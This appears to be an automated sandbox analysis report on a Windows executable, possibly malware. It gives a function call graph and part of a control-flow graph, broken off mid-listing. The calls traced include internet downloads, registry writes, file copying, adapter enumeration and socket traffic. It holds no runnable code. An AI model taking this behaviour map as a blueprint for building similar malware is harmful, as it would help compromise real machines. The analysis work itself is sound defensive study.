61150 2e0aa81 61149->61150 61151 402a23 RegOpenKeyExA 61152 402a3f 61151->61152 61153 2dcfe33 61154 2dcfddc DeleteFileA 61153->61154 61155 2dcfe37 61153->61155 61157 2d972ab InternetOpenA 61158 2d972c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 61157->61158 61167 2d97389 __cftof2_l 61157->61167 61261 2da4af0 61158->61261 61161 2d97382 InternetCloseHandle 61161->61167 61162 2d97342 InternetReadFile 61166 2d97377 InternetCloseHandle 61162->61166 61163 2d96708 Sleep 61164 2d9670e RtlEnterCriticalSection RtlLeaveCriticalSection 61163->61164 61172 2d96744 __cftof2_l 61164->61172 61166->61161 61168 2d973e9 RtlEnterCriticalSection RtlLeaveCriticalSection 61167->61168 61196 2d966f4 61167->61196 61263 2da233c 61168->61263 61170 2d97413 61171 2d97463 61170->61171 61174 2da233c 66 API calls 61170->61174 61173 2da233c 66 API calls 61171->61173 61171->61196 61175 2d97484 61173->61175 61176 2d97427 61174->61176 61177 2d97738 61175->61177 61180 2da2fac _malloc 59 API calls 61175->61180 61176->61171 61179 2da233c 66 API calls 61176->61179 61178 2da233c 66 API calls 61177->61178 61181 2d97750 61178->61181 61182 2d9743b 61179->61182 61183 2d9749d RtlEnterCriticalSection RtlLeaveCriticalSection 61180->61183 61184 2d9779d 61181->61184 61187 2d9775a __cftof2_l 61181->61187 61182->61171 61186 2da233c 66 API calls 61182->61186 61212 2d974d5 __cftof2_l 61183->61212 61185 2da233c 66 API calls 61184->61185 61188 2d977ab 61185->61188 61189 2d9744f 61186->61189 61192 2d9776a RtlEnterCriticalSection RtlLeaveCriticalSection 61187->61192 61190 2d977b1 61188->61190 61191 2d977d0 61188->61191 61189->61171 61194 2da233c 66 API calls 61189->61194 61316 2d961f5 61190->61316 61195 2da233c 66 API calls 61191->61195 61192->61196 61194->61171 61197 2d977de 61195->61197 61196->61163 61196->61164 61198 2d97b00 61197->61198 61201 2d977f0 61197->61201 61199 2da233c 66 API calls 61198->61199 61200 2d97b0e 61199->61200 61200->61196 61202 2da2fac _malloc 59 API calls 61200->61202 61201->61196 61319 2da2418 61201->61319 61207 2d97b22 __cftof2_l 61202->61207 61206 2d978aa 61208 2d978e2 RtlEnterCriticalSection 61206->61208 61209 2d97b4f 61207->61209 61389 2d9534d 93 API calls 2 library calls 61207->61389 61210 2d9790f RtlLeaveCriticalSection 61208->61210 61211 2d97905 61208->61211 61215 2da2f74 _free 59 API calls 61209->61215 61337 2d93c67 61210->61337 61211->61210 61217 2da233c 66 API calls 61212->61217 61221 2d9755c 61212->61221 61214 2da2fac _malloc 59 API calls 61222 2d97593 __cftof2_l 61214->61222 61215->61196 61217->61221 61221->61214 61226 2d975f8 61222->61226 61382 2da35e6 60 API calls 2 library calls 61222->61382 61225 2d97ae7 61388 2d99003 88 API calls __EH_prolog 61225->61388 61229 2da2f74 _free 59 API calls 61226->61229 61231 2d975fe 61229->61231 61231->61177 61233 2da3b4c _Allocate 60 API calls 61231->61233 61240 2d9760e 61233->61240 61238 2d9a725 73 API calls 61246 2d97a1a 61238->61246 61239 2d97629 61273 2d9a84f 61239->61273 61240->61239 61385 2d99737 212 API calls __EH_prolog 61240->61385 61244 2d9763f 61277 2d95119 61244->61277 61245 2d975c4 61245->61226 61383 2da2850 59 API calls _vscan_fn 61245->61383 61384 2da35e6 60 API calls 2 library calls 61245->61384 61247 2d9a725 73 API calls 61246->61247 61251 2d97aaf 61246->61251 61249 2d97a6b 61247->61249 61249->61251 61362 2d9d117 61249->61362 61367 2d983ea 61251->61367 61252 2d97687 61306 2d9ac0f 61252->61306 61255 2d976ec Sleep 61386 2da18f0 GetProcessHeap HeapFree 61255->61386 61256 2d976e7 shared_ptr 61256->61255 61258 2d97708 61259 2d97722 shared_ptr 61258->61259 61387 2d94100 GetProcessHeap HeapFree 61258->61387 61259->61177 61262 2d97322 InternetOpenUrlA 61261->61262 61262->61161 61262->61162 61264 2da2348 61263->61264 61265 2da236b 61263->61265 61264->61265 61267 2da234e 61264->61267 61392 2da2383 66 API calls 5 library calls 61265->61392 61390 2da5e5b 59 API calls __getptd_noexit 61267->61390 61268 2da237e 61268->61170 61270 2da2353 61391 2da4ef5 9 API calls __write_nolock 61270->61391 61272 2da235e 61272->61170 61274 2d9a859 __EH_prolog 61273->61274 61393 2d9e000 61274->61393 61276 2d9a877 shared_ptr 61276->61244 61278 2d95123 __EH_prolog 61277->61278 61397 2da0b10 61278->61397 61281 2d93c67 72 API calls 61282 2d9514a 61281->61282 61283 2d93d7e 64 API calls 61282->61283 61284 2d95158 61283->61284 61285 2d9833b 89 API calls 61284->61285 61286 2d9516c 61285->61286 61287 2d95322 shared_ptr 61286->61287 61288 2d9a725 73 API calls 61286->61288 61287->61252 61289 2d9519d 61288->61289 61289->61287 61290 2d951c4 61289->61290 61291 2d951f6 61289->61291 61293 2d9a725 73 API calls 61290->61293 61292 2d9a725 73 API calls 61291->61292 61295 2d95207 61292->61295 61294 2d951d4 61293->61294 61294->61287 61298 2d9a725 73 API calls 61294->61298 61295->61287 61296 2d9a725 73 API calls 61295->61296 61297 2d9524a 61296->61297 61297->61287 61300 2d9a725 73 API calls 61297->61300 61299 2d952b4 61298->61299 61299->61287 61301 2d9a725 73 API calls 61299->61301 61300->61294 61302 2d952da 61301->61302 61302->61287 61303 2d9a725 73 API calls 61302->61303 61304 2d95304 61303->61304 61401 2d9ced9 61304->61401 61307 2d9ac19 __EH_prolog 61306->61307 61425 2d9d0ee 72 API calls 61307->61425 61310 2d9ac3a shared_ptr 61426 2da20f0 61310->61426 61311 2d9ac51 61312 2d976d4 61311->61312 61432 2d93fb0 68 API calls Mailbox 61311->61432 61312->61255 61312->61256 61314 2d9ac5d 61433 2d9a68b 60 API calls 4 library calls 61314->61433 61317 2da2fac _malloc 59 API calls 61316->61317 61318 2d96208 61317->61318 61320 2da2449 61319->61320 61321 2da2434 61319->61321 61320->61321 61323 2da2450 61320->61323 61668 2da5e5b 59 API calls __getptd_noexit 61321->61668 61326 2d97827 61323->61326 61670 2da5f01 79 API calls 7 library calls 61323->61670 61324 2da2439 61669 2da4ef5 9 API calls __write_nolock 61324->61669 61328 2d91ba7 61326->61328 61671 2db53f0 61328->61671 61330 2d91bb1 RtlEnterCriticalSection 61331 2d91be9 RtlLeaveCriticalSection 61330->61331 61333 2d91bd1 61330->61333 61672 2d9e330 61331->61672 61333->61331 61334 2d91c55 RtlLeaveCriticalSection 61333->61334 61334->61206 61335 2d91c22 61335->61334 61338 2da0b10 Mailbox 68 API calls 61337->61338 61339 2d93c7e 61338->61339 61735 2d93ca2 61339->61735 61344 2d93d7e 61345 2d93d99 htons 61344->61345 61346 2d93dcb htons 61344->61346 61764 2d93bd3 60 API calls 2 library calls 61345->61764 61765 2d93c16 60 API calls 2 library calls 61346->61765 61349 2d93db7 htonl htonl 61350 2d93ded 61349->61350 61351 2d9833b 61350->61351 61352 2d98374 61351->61352 61353 2d98353 61351->61353 61356 2d9796c 61352->61356 61769 2d92ac7 61352->61769 61766 2d995fd 61353->61766 61356->61225 61357 2d9a725 61356->61357 61358 2da0b10 Mailbox 68 API calls 61357->61358 61360 2d9a73f 61358->61360 61359 2d979b8 61359->61238 61359->61251 61360->61359 61840 2d92db5 61360->61840 61363 2da0b10 Mailbox 68 API calls 61362->61363 61364 2d9d12d 61363->61364 61365 2d9d21b 61364->61365 61366 2d92db5 73 API calls 61364->61366 61365->61251 61366->61364 61368 2d98405 WSASetLastError shutdown 61367->61368 61369 2d983f5 61367->61369 61371 2d9a509 69 API calls 61368->61371 61370 2da0b10 Mailbox 68 API calls 61369->61370 61372 2d97ac7 61370->61372 61373 2d98422 61371->61373 61375 2d933b2 61372->61375 61373->61372 61374 2da0b10 Mailbox 68 API calls 61373->61374 61374->61372 61376 2d933e1 61375->61376 61377 2d933c4 InterlockedCompareExchange 61375->61377 61379 2d929ee 76 API calls 61376->61379 61377->61376 61378 2d933d6 61377->61378 61864 2d932ab 78 API calls 2 library calls 61378->61864 61381 2d933f1 61379->61381 61381->61225 61382->61245 61383->61245 61384->61245 61385->61239 61386->61258 61387->61259 61388->61196 61389->61209 61390->61270 61391->61272 61392->61268 61394 2d9e00a __EH_prolog 61393->61394 61395 2da3b4c _Allocate 60 API calls 61394->61395 61396 2d9e021 61395->61396 61396->61276 61398 2da0b39 61397->61398 61399 2d9513d 61397->61399 61400 2da33a4 __cinit 68 API calls 61398->61400 61399->61281 61400->61399 61402 2da0b10 Mailbox 68 API calls 61401->61402 61403 2d9cef3 61402->61403 61404 2d9d002 61403->61404 61406 2d92b95 61403->61406 61404->61287 61407 2d92bb1 61406->61407 61408 2d92bc7 61406->61408 61409 2da0b10 Mailbox 68 API calls 61407->61409 61411 2d92bd2 61408->61411 61419 2d92bdf 61408->61419 61414 2d92bb6 61409->61414 61410 2d92be2 WSASetLastError WSARecv 61421 2d9a509 61410->61421 61413 2da0b10 Mailbox 68 API calls 61411->61413 61413->61414 61414->61403 61415 2d92d22 61424 2d91996 68 API calls __cinit 61415->61424 61417 2d92cbc WSASetLastError select 61418 2d9a509 69 API calls 61417->61418 61418->61419 61419->61410 61419->61414 61419->61415 61419->61417 61420 2da0b10 68 API calls Mailbox 61419->61420 61420->61419 61422 2da0b10 Mailbox 68 API calls 61421->61422 61423 2d9a515 WSAGetLastError 61422->61423 61423->61419 61424->61414 61425->61310 61434 2da33b9 61426->61434 61429 2da2114 61429->61311 61430 2da213d ResumeThread 61430->61311 61431 2da2136 CloseHandle 61431->61430 61432->61314 61435 2da33db 61434->61435 61436 2da33c7 61434->61436 61437 2da8a6d __calloc_crt 59 API calls 61435->61437 61458 2da5e5b 59 API calls __getptd_noexit 61436->61458 61439 2da33e8 61437->61439 61441 2da3439 61439->61441 61453 2da5c5a 61439->61453 61440 2da33cc 61459 2da4ef5 9 API calls __write_nolock 61440->61459 61444 2da2f74 _free 59 API calls 61441->61444 61447 2da343f 61444->61447 61445 2da210b 61445->61429 61445->61430 61445->61431 61447->61445 61460 2da5e3a 59 API calls 3 library calls 61447->61460 61448 2da5ce1 __initptd 59 API calls 61449 2da33fe CreateThread 61448->61449 61449->61445 61452 2da3431 GetLastError 61449->61452 61477 2da3519 61449->61477 61452->61441 61461 2da5c72 GetLastError 61453->61461 61455 2da5c60 61456 2da33f5 61455->61456 61475 2da8440 59 API calls 3 library calls 61455->61475 61456->61448 61458->61440 61459->61445 61460->61445 61462 2da91cb __getptd_noexit TlsGetValue 61461->61462 61463 2da5c87 61462->61463 61464 2da5cd5 SetLastError 61463->61464 61465 2da8a6d __calloc_crt 56 API calls 61463->61465 61464->61455 61466 2da5c9a 61465->61466 61466->61464 61476 2da91ea TlsSetValue 61466->61476 61468 2da5cae 61469 2da5ccc 61468->61469 61470 2da5cb4 61468->61470 61472 2da2f74 _free 56 API calls 61469->61472 61471 2da5ce1 __initptd 56 API calls 61470->61471 61473 2da5cbc GetCurrentThreadId 61471->61473 61474 2da5cd2 61472->61474 61473->61464 61474->61464 61476->61468 61478 2da3522 __threadstartex@4 61477->61478 61479 2da91cb __getptd_noexit TlsGetValue 61478->61479 61480 2da3528 61479->61480 61481 2da355b 61480->61481 61482 2da352f __threadstartex@4 61480->61482 61510 2da5aef 59 API calls 6 library calls 61481->61510 61509 2da91ea TlsSetValue 61482->61509 61485 2da353e 61486 2da3551 GetCurrentThreadId 61485->61486 61487 2da3544 GetLastError RtlExitUserThread 61485->61487 61489 2da3576 ___crtIsPackagedApp 61486->61489 61487->61486 61488 2da358a 61499 2da3452 61488->61499 61489->61488 61493 2da34c1 61489->61493 61494 2da34ca LoadLibraryExW GetProcAddress 61493->61494 61495 2da3503 RtlDecodePointer 61493->61495 61496 2da34ec 61494->61496 61497 2da34ed RtlEncodePointer 61494->61497 61498 2da3513 61495->61498 61496->61488 61497->61495 61498->61488 61500 2da345e __alloc_osfhnd 61499->61500 61501 2da5c5a __write_nolock 59 API calls 61500->61501 61502 2da3463 61501->61502 61511 2da2160 61502->61511 61505 2da3473 61506 2da8d94 __XcptFilter 59 API calls 61505->61506 61507 2da3484 61506->61507 61509->61485 61510->61489 61529 2da1610 61511->61529 61514 2da21a8 TlsSetValue 61515 2da21b0 61514->61515 61551 2d9ddb4 61515->61551 61520 2da3493 61521 2da5c72 __getptd_noexit 59 API calls 61520->61521 61522 2da349c 61521->61522 61523 2da34b7 RtlExitUserThread 61522->61523 61524 2da34ab 61522->61524 61525 2da34b0 61522->61525 61666 2da3596 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61524->61666 61667 2da5c24 59 API calls 2 library calls 61525->61667 61528 2da34b6 61528->61523 61530 2da1674 61529->61530 61531 2da16f0 61530->61531 61532 2da168c 61530->61532 61538 2da179c WaitForSingleObject 61530->61538 61545 2da1770 CreateEventA 61530->61545 61549 2da178e CloseHandle 61530->61549 61576 2da1c10 GetCurrentProcessId 61530->61576 61533 2da1706 61531->61533 61536 2da1703 CloseHandle 61531->61536 61535 2da16ce ResetEvent 61532->61535 61539 2da16a5 OpenEventA 61532->61539 61574 2da1c10 GetCurrentProcessId 61532->61574 61567 2da454b 61533->61567 61546 2da16d5 61535->61546 61536->61533 61537 2da171e 61537->61514 61537->61515 61538->61530 61541 2da16bf 61539->61541 61542 2da16c7 61539->61542 61541->61542 61544 2da16c4 CloseHandle 61541->61544 61542->61535 61542->61546 61543 2da16a2 61543->61539 61544->61542 61545->61530 61575 2da1850 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61546->61575 61549->61530 61550 2da16ed 61550->61531 61552 2d9ddd6 61551->61552 61578 2d94d86 61552->61578 61553 2d9ddd9 61555 2da1f30 61553->61555 61556 2da1f69 TlsGetValue 61555->61556 61565 2da1f61 Mailbox 61555->61565 61556->61565 61557 2da1fdd 61558 2da2006 61557->61558 61562 2da1ffe GetProcessHeap HeapFree 61557->61562 61558->61520 61559 2da1fb9 61560 2da1610 17 API calls 61559->61560 61563 2da1fc8 61560->61563 61561 2da2049 GetProcessHeap HeapFree 61561->61565 61562->61558 61563->61557 61564 2da1fd5 TlsSetValue 61563->61564 61564->61557 61565->61557 61565->61559 61565->61561 61566 2da203b GetProcessHeap HeapFree 61565->61566 61566->61561 61568 2da4553 61567->61568 61569 2da4555 IsProcessorFeaturePresent 61567->61569 61568->61537 61571 2da958f 61569->61571 61577 2da953e 5 API calls ___raise_securityfailure 61571->61577 61573 2da9672 61573->61537 61574->61543 61575->61550 61576->61530 61577->61573 61579 2d94d90 __EH_prolog 61578->61579 61580 2da0b10 Mailbox 68 API calls 61579->61580 61581 2d94da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61580->61581 61582 2d950d4 shared_ptr 61581->61582 61595 2d94dd1 std::bad_exception::bad_exception 61581->61595 61582->61553 61584 2d950a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61585 2d950b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61584->61585 61585->61582 61585->61595 61586 2d9a725 73 API calls 61586->61595 61588 2d94e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61589 2d94e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61588->61589 61589->61595 61590 2d9ced9 73 API calls 61590->61595 61595->61584 61595->61585 61595->61586 61595->61588 61595->61589 61595->61590 61598 2d94bed 61595->61598 61622 2d97d24 60 API calls 61595->61622 61623 2d9d00b 60 API calls 2 library calls 61595->61623 61624 2d97cfe 60 API calls std::bad_exception::bad_exception 61595->61624 61625 2d9a9b2 60 API calls 2 library calls 61595->61625 61626 2d9aa8a 210 API calls 3 library calls 61595->61626 61627 2da18f0 GetProcessHeap HeapFree 61595->61627 61628 2d94100 GetProcessHeap HeapFree 61595->61628 61599 2d94bf7 __EH_prolog 61598->61599 61600 2d91ba7 209 API calls 61599->61600 61601 2d94c31 61600->61601 61629 2d93a94 61601->61629 61603 2d94c3c 61604 2d93a94 60 API calls 61603->61604 61605 2d94c56 61604->61605 61632 2d985d2 61605->61632 61610 2da0b10 Mailbox 68 API calls 61611 2d94cb8 61610->61611 61657 2d9c290 61611->61657 61613 2d94ce1 InterlockedExchange 61661 2d92995 95 API calls Mailbox 61613->61661 61615 2d94d3c 61665 2d9861b 75 API calls 2 library calls 61615->61665 61618 2d94d06 61618->61615 61662 2d9858e 76 API calls Mailbox 61618->61662 61663 2d982f8 82 API calls Mailbox 61618->61663 61664 2d92995 95 API calls Mailbox 61618->61664 61619 2d94d57 shared_ptr 61619->61595 61622->61595 61623->61595 61624->61595 61625->61595 61626->61595 61627->61595 61628->61595 61630 2d939ee 60 API calls 61629->61630 61631 2d93ab5 61630->61631 61631->61603 61633 2da0b10 Mailbox 68 API calls 61632->61633 61634 2d985e8 61633->61634 61635 2d99a21 77 API calls 61634->61635 61636 2d98602 61635->61636 61637 2d91712 60 API calls 61636->61637 61638 2d94c8b 61637->61638 61639 2d9e0f8 61638->61639 61640 2d9e102 __EH_prolog 61639->61640 61641 2d91a01 61 API calls 61640->61641 61642 2d9e119 61641->61642 61643 2d9e156 InterlockedExchangeAdd 61642->61643 61644 2da0b10 Mailbox 68 API calls 61642->61644 61646 2d9e191 RtlEnterCriticalSection 61643->61646 61647 2d9e186 61643->61647 61644->61643 61649 2d97f5b 60 API calls 61646->61649 61648 2d91ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61647->61648 61651 2d9e18f 61648->61651 61650 2d9e1b7 InterlockedIncrement 61649->61650 61652 2d9e1ce RtlLeaveCriticalSection 61650->61652 61653 2d9e1c7 61650->61653 61655 2d9e852 TlsGetValue 61651->61655 61652->61651 61654 2d927f3 SetWaitableTimer 61653->61654 61654->61652 61656 2d94ca4 61655->61656 61656->61610 61658 2d9c2a3 61657->61658 61659 2d9c2cc 61658->61659 61660 2d9e9c1 83 API calls 61658->61660 61659->61613 61660->61659 61661->61618 61662->61618 61663->61618 61664->61618 61665->61619 61666->61525 61667->61528 61668->61324 61669->61326 61670->61326 61671->61330 61673 2d9e33a __EH_prolog 61672->61673 61674 2da3b4c _Allocate 60 API calls 61673->61674 61675 2d9e343 61674->61675 61676 2d91bfa RtlEnterCriticalSection 61675->61676 61678 2d9e551 61675->61678 61676->61335 61679 2d9e55b __EH_prolog 61678->61679 61682 2d926db RtlEnterCriticalSection 61679->61682 61681 2d9e5b1 61681->61676 61683 2d92728 CreateWaitableTimerA 61682->61683 61684 2d9277e 61682->61684 61686 2d92738 GetLastError 61683->61686 61687 2d9275b SetWaitableTimer 61683->61687 61685 2d927d5 RtlLeaveCriticalSection 61684->61685 61688 2da3b4c _Allocate 60 API calls 61684->61688 61685->61681 61689 2da0b10 Mailbox 68 API calls 61686->61689 61687->61684 61691 2d9278a 61688->61691 61690 2d92745 61689->61690 61726 2d91712 61690->61726 61693 2d927c8 61691->61693 61694 2da3b4c _Allocate 60 API calls 61691->61694 61732 2d97e03 CloseHandle 61693->61732 61696 2d927a9 61694->61696 61698 2d91cf8 CreateEventA 61696->61698 61699 2d91d23 GetLastError 61698->61699 61700 2d91d52 CreateEventA 61698->61700 61704 2d91d33 61699->61704 61701 2d91d6b GetLastError 61700->61701 61702 2d91d96 61700->61702 61706 2d91d7b 61701->61706 61703 2da33b9 __beginthreadex 201 API calls 61702->61703 61707 2d91db6 61703->61707 61705 2da0b10 Mailbox 68 API calls 61704->61705 61708 2d91d3c 61705->61708 61709 2da0b10 Mailbox 68 API calls 61706->61709 61710 2d91e0d 61707->61710 61711 2d91dc6 GetLastError 61707->61711 61712 2d91712 60 API calls 61708->61712 61713 2d91d84 61709->61713 61714 2d91e1d 61710->61714 61715 2d91e11 WaitForSingleObject CloseHandle 61710->61715 61716 2d91dd8 61711->61716 61717 2d91d4e 61712->61717 61718 2d91712 60 API calls 61713->61718 61714->61693 61715->61714 61719 2d91ddc CloseHandle 61716->61719 61720 2d91ddf 61716->61720 61717->61700 61718->61702 61719->61720 61721 2d91de9 CloseHandle 61720->61721 61722 2d91dee 61720->61722 61721->61722 61723 2da0b10 Mailbox 68 API calls 61722->61723 61724 2d91dfb 61723->61724 61725 2d91712 60 API calls 61724->61725 61725->61710 61727 2d9171c __EH_prolog 61726->61727 61728 2d9173e 61727->61728 61733 2d91815 59 API calls std::exception::exception 61727->61733 61728->61687 61730 2d91732 61734 2d9a4a2 60 API calls 2 library calls 61730->61734 61732->61685 61733->61730 61746 2d930ae WSASetLastError 61735->61746 61738 2d930ae 71 API calls 61739 2d93c90 61738->61739 61740 2d916ae 61739->61740 61741 2d916b8 __EH_prolog 61740->61741 61742 2d91701 61741->61742 61762 2da24d3 59 API calls std::exception::_Copy_str 61741->61762 61742->61344 61744 2d916dc 61763 2d9a4a2 60 API calls 2 library calls 61744->61763 61747 2d930ec WSAStringToAddressA 61746->61747 61748 2d930ce 61746->61748 61750 2d9a509 69 API calls 61747->61750 61748->61747 61749 2d930d3 61748->61749 61751 2da0b10 Mailbox 68 API calls 61749->61751 61752 2d93114 61750->61752 61761 2d930d8 61751->61761 61753 2d93154 61752->61753 61759 2d9311e _memcmp 61752->61759 61754 2d93135 61753->61754 61756 2da0b10 Mailbox 68 API calls 61753->61756 61755 2d93193 61754->61755 61757 2da0b10 Mailbox 68 API calls 61754->61757 61760 2da0b10 Mailbox 68 API calls 61755->61760 61755->61761 61756->61754 61757->61755 61758 2da0b10 Mailbox 68 API calls 61758->61754 61759->61754 61759->61758 61760->61761 61761->61738 61761->61739 61762->61744 61764->61349 61765->61350 61787 2d9353e 61766->61787 61770 2d92ae8 WSASetLastError connect 61769->61770 61771 2d92ad8 61769->61771 61773 2d9a509 69 API calls 61770->61773 61772 2da0b10 Mailbox 68 API calls 61771->61772 61774 2d92add 61772->61774 61775 2d92b07 61773->61775 61776 2da0b10 Mailbox 68 API calls 61774->61776 61775->61774 61777 2da0b10 Mailbox 68 API calls 61775->61777 61778 2d92b1b 61776->61778 61777->61774 61779 2da0b10 Mailbox 68 API calls 61778->61779 61781 2d92b38 61778->61781 61779->61781 61786 2d92b87 61781->61786 61838 2d93027 71 API calls Mailbox 61781->61838 61782 2d92b59 61782->61786 61839 2d92fb4 71 API calls Mailbox 61782->61839 61784 2d92b7a 61785 2da0b10 Mailbox 68 API calls 61784->61785 61784->61786 61785->61786 61786->61356 61788 2d93548 __EH_prolog 61787->61788 61789 2d93557 61788->61789 61790 2d93576 61788->61790 61817 2d91996 68 API calls __cinit 61789->61817 61809 2d92edd WSASetLastError WSASocketA 61790->61809 61793 2d9355f 61793->61352 61795 2d935ad CreateIoCompletionPort 61796 2d935db 61795->61796 61797 2d935c5 GetLastError 61795->61797 61799 2da0b10 Mailbox 68 API calls 61796->61799 61798 2da0b10 Mailbox 68 API calls 61797->61798 61800 2d935d2 61798->61800 61799->61800 61801 2d935ef 61800->61801 61802 2d93626 61800->61802 61803 2da0b10 Mailbox 68 API calls 61801->61803 61836 2d9def3 60 API calls 2 library calls 61802->61836 61804 2d93608 61803->61804 61818 2d929ee 61804->61818 61807 2d93659 61808 2da0b10 Mailbox 68 API calls 61807->61808 61808->61793 61810 2da0b10 Mailbox 68 API calls 61809->61810 61811 2d92f0a WSAGetLastError 61810->61811 61812 2d92f21 61811->61812 61816 2d92f41 61811->61816 61813 2d92f3c 61812->61813 61814 2d92f27 setsockopt 61812->61814 61815 2da0b10 Mailbox 68 API calls 61813->61815 61814->61813 61815->61816 61816->61793 61816->61795 61817->61793 61820 2d92a0c 61818->61820 61835 2d92aad 61818->61835 61819 2d92a39 WSASetLastError closesocket 61822 2d9a509 69 API calls 61819->61822 61820->61819 61825 2da0b10 Mailbox 68 API calls 61820->61825 61821 2da0b10 Mailbox 68 API calls 61823 2d92ab8 61821->61823 61824 2d92a51 61822->61824 61823->61793 61827 2da0b10 Mailbox 68 API calls 61824->61827 61824->61835 61826 2d92a21 61825->61826 61837 2d92f50 71 API calls Mailbox 61826->61837 61829 2d92a5c 61827->61829 61831 2d92a7b ioctlsocket WSASetLastError closesocket 61829->61831 61832 2da0b10 Mailbox 68 API calls 61829->61832 61830 2d92a36 61830->61819 61834 2d9a509 69 API calls 61831->61834 61833 2d92a6e 61832->61833 61833->61831 61833->61835 61834->61835 61835->61821 61835->61823 61836->61807 61837->61830 61838->61782 61839->61784 61841 2d92dca 61840->61841 61842 2d92de4 61840->61842 61843 2da0b10 Mailbox 68 API calls 61841->61843 61844 2d92dfc 61842->61844 61846 2d92def 61842->61846 61845 2d92dcf 61843->61845 61854 2d92d39 WSASetLastError WSASend 61844->61854 61845->61360 61848 2da0b10 Mailbox 68 API calls 61846->61848 61848->61845 61849 2d92e0c 61849->61845 61850 2d92e54 WSASetLastError select 61849->61850 61852 2da0b10 68 API calls Mailbox 61849->61852 61853 2d92d39 71 API calls 61849->61853 61851 2d9a509 69 API calls 61850->61851 61851->61849 61852->61849 61853->61849 61855 2d9a509 69 API calls 61854->61855 61856 2d92d6e 61855->61856 61857 2d92d75 61856->61857 61860 2d92d82 61856->61860 61858 2da0b10 Mailbox 68 API calls 61857->61858 61859 2d92d7a 61858->61859 61862 2d92d9c 61859->61862 61863 2da0b10 Mailbox 68 API calls 61859->61863 61860->61859 61861 2da0b10 Mailbox 68 API calls 61860->61861 61861->61859 61862->61849 61863->61862 61864->61376 61865 402cf3 61866 40da23 CreateDirectoryA 61865->61866 61867 402c74 CopyFileA 61868 2dda6ea 61869 2de4d1b CreateFileA 61868->61869 61871 40d239 RegSetValueExA 61872 40d7e3 RegCloseKey 61871->61872 61873 40d866 SetEvent 61872->61873 61874 40d8f7 61873->61874 61874->61874 61875 2dcfd26 61879 2dd3769 61875->61879 61882 2de5e00 61875->61882 61880 2df4659 WriteFile 61879->61880 61881 2e2697c 61880->61881 61883 2e1d337 CreateFileA 61882->61883 61884 402c3b 61887 401f64 FindResourceA 61884->61887 61886 402c40 61888 401f86 GetLastError SizeofResource 61887->61888 61889 401f9f 61887->61889 61888->61889 61890 401fa6 LoadResource LockResource GlobalAlloc 61888->61890 61889->61886 61891 401fd2 61890->61891 61892 401ffb GetTickCount 61891->61892 61894 402005 GlobalAlloc 61892->61894 61894->61889 61895 2d9f9a7 LoadLibraryA 61896 2d9fa8a 61895->61896 61897 2d9f9d0 GetProcAddress 61895->61897 61898 2d9fa83 FreeLibrary 61897->61898 61900 2d9f9e4 61897->61900 61898->61896 61899 2d9f9f6 GetAdaptersInfo 61899->61900 61900->61899 61901 2d9fa7e 61900->61901 61902 2da3b4c _Allocate 60 API calls 61900->61902 61901->61898 61902->61900

                                                                          Executed Functions

                                                                          Function 02D972AB Relevance: 74.2, APIs: 29, Strings: 13, Instructions: 659networksleepfileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 2d972ab-2d972c3 InternetOpenA 1 2d97389-2d9738f 0->1 2 2d972c9-2d97340 InternetSetOptionA * 3 call 2da4af0 InternetOpenUrlA 0->2 4 2d973ab-2d973b9 1->4 5 2d97391-2d97397 1->5 14 2d97382-2d97383 InternetCloseHandle 2->14 15 2d97342 2->15 6 2d973bf-2d973e3 call 2da4af0 call 2d9439c 4->6 7 2d966f4-2d966f6 4->7 9 2d97399-2d9739b 5->9 10 2d9739d-2d973aa call 2d953ec 5->10 6->7 31 2d973e9-2d97417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2da233c 6->31 11 2d966f8-2d966fd 7->11 12 2d966ff-2d96701 7->12 9->4 10->4 17 2d96708 Sleep 11->17 18 2d9670e-2d96742 RtlEnterCriticalSection RtlLeaveCriticalSection 12->18 19 2d96703 12->19 14->1 21 2d97346-2d9736c InternetReadFile 15->21 17->18 24 2d96792 18->24 25 2d96744-2d96750 18->25 19->17 26 2d9736e-2d97375 21->26 27 2d97377-2d9737e InternetCloseHandle 21->27 30 2d96796 24->30 25->24 29 2d96752-2d9675f 25->29 26->21 27->14 32 2d96761-2d96765 29->32 33 2d96767-2d96768 29->33 38 2d97419-2d9742b call 2da233c 31->38 39 2d9746d-2d97488 call 2da233c 31->39 35 2d9676c-2d96790 call 2da4af0 * 2 32->35 33->35 35->30 38->39 49 2d9742d-2d9743f call 2da233c 38->49 47 2d9748e-2d97490 39->47 48 2d97742-2d97754 call 2da233c 39->48 47->48 50 2d97496-2d97548 call 2da2fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2da4af0 * 5 call 2d9439c * 2 47->50 57 2d9779d-2d977af call 2da233c 48->57 58 2d97756-2d97758 48->58 49->39 59 2d97441-2d97453 call 2da233c 49->59 115 2d9754a-2d9754c 50->115 116 2d97585 50->116 68 2d977b1-2d977bf call 2d961f5 call 2d96303 57->68 69 2d977d0-2d977e2 call 2da233c 57->69 58->57 63 2d9775a-2d97798 call 2da4af0 RtlEnterCriticalSection RtlLeaveCriticalSection 58->63 59->39 70 2d97455-2d97467 call 2da233c 59->70 63->7 86 2d977c4-2d977cb call 2d9640e 68->86 83 2d977e8-2d977ea 69->83 84 2d97b00-2d97b12 call 2da233c 69->84 70->7 70->39 83->84 88 2d977f0-2d97807 call 2d9439c 83->88 84->7 95 2d97b18-2d97b46 call 2da2fac call 2da4af0 call 2d9439c 84->95 86->7 88->7 97 2d9780d-2d978db call 2da2418 call 2d91ba7 88->97 117 2d97b48-2d97b4a call 2d9534d 95->117 118 2d97b4f-2d97b56 call 2da2f74 95->118 113 2d978dd call 2d9143f 97->113 114 2d978e2-2d97903 RtlEnterCriticalSection 97->114 113->114 121 2d9790f-2d97973 RtlLeaveCriticalSection call 2d93c67 call 2d93d7e call 2d9833b 114->121 122 2d97905-2d9790c 114->122 115->116 123 2d9754e-2d97560 call 2da233c 115->123 119 2d97589-2d975b7 call 2da2fac call 2da4af0 call 2d9439c 116->119 117->118 